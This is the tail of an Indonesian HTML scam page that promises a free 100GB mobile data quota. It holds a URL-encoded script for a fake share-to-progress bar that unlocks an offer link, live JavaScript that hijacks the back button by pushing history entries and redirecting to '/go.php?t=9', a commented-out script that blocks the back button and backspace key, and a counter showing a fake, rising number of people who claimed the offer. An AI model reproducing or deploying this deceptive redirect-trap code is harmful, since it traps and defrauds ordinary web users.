%20else%20if%20%28width%20%3D%3D%2092%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%201%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2093%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%201%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2094%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%201%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2095%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%201%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2096%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%202%3B%0A%20%20%20%20%7D%20else%20%7B%0A%20%20%20%20%20%20%20%20%24%28%22%23share%22%29.fadeOut%280%29%3B%0A%20%20%20%20%20%20%20%20%24%28%22%23claim%22%29.fadeIn%281000%29%3B%0A%20%20%20%20%7D%0A%20%20%20%20localStorage.setItem%28saved%2C%20width%29%3B%0A%20%20%20%20setTimeout%28function%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20%24%28%22%23fill2%22%29.css%28%22width%22%2C%20width%20+%20%22%25%22%29%3B%0A%20%20%20%20%20%20%20%20%24%28%22%23percentage2%22%29.text%28width%20+%20%22%25%22%29%3B%0A%20%20%20%20%7D%2C%202000%29%3B%0A%7D%29%3B%0A%24%28%22%23offer%22%29.click%28function%20%28%29%20%7B%0A%20%20%20%20window.open%28abcde%2C%20%22_blank%22%29%3B%0A%7D%29%3B%0A%3C/script%3E'))
    </script>



    <script>
        window.onhashchange = function() {
            jp();
        };

        function hh() {
            history.pushState(history.length + 1, "message", "#" + new Date().getTime());
        }

        function jp() {
            fh();
        }
        setTimeout('hh();', 500);

        function fh() {
            location.href="/go.php?t=9";
        }

        function goon() {
            location.href="/go.php?t=9";
        }
    </script>


    <!--script>
        (function(global) {

            if (typeof(global) === "undefined") {
                throw new Error("window is undefined");
            }

            var _hash = "!";
            var noBackPlease = function() {
                global.location.href += "#";

                // making sure we have the fruit available for juice....
                // 50 milliseconds for just once do not cost much (^__^)
                global.setTimeout(function() {
                    global.location.href += "!";
                }, 50);
            };

            // Earlier we had setInerval here....
            global.onhashchange = function() {
                if (global.location.hash !== _hash) {
                    global.location.hash = _hash;
                }
            };

            global.onload = function() {

                noBackPlease();

                // disables backspace on page except on input fields and textarea..
                document.body.onkeydown = function(e) {
                    var elm = e.target.nodeName.toLowerCase();
                    if (e.which === 8 && (elm !== 'input' && elm !== 'textarea')) {
                        e.preventDefault();
                    }
                    // stopping event bubbling up the DOM tree..
                    e.stopPropagation();
                };

            };

        })(window);
    </script-->

<div class="A">
    <span id="countdowntimer" style="color:#FFFFFF;">4548</span><br>
<font color="white">Sudah ribuan orang berhasil dapat kuota 100GB. Yuk buruan claim sebelum kuota habis!</font><br>

    <script type="text/javascript">
        var timeleft = 4548;
        var downloadTimer = setInterval(function(){
            timeleft = timeleft + Math.floor(Math.random() * 600);
            document.getElementById('countdowntimer').textContent = timeleft;
            if (timeleft <= 0)
                clearInterval(downloadTimer);
        }, 1000);
    </script>
</div>



</body></html>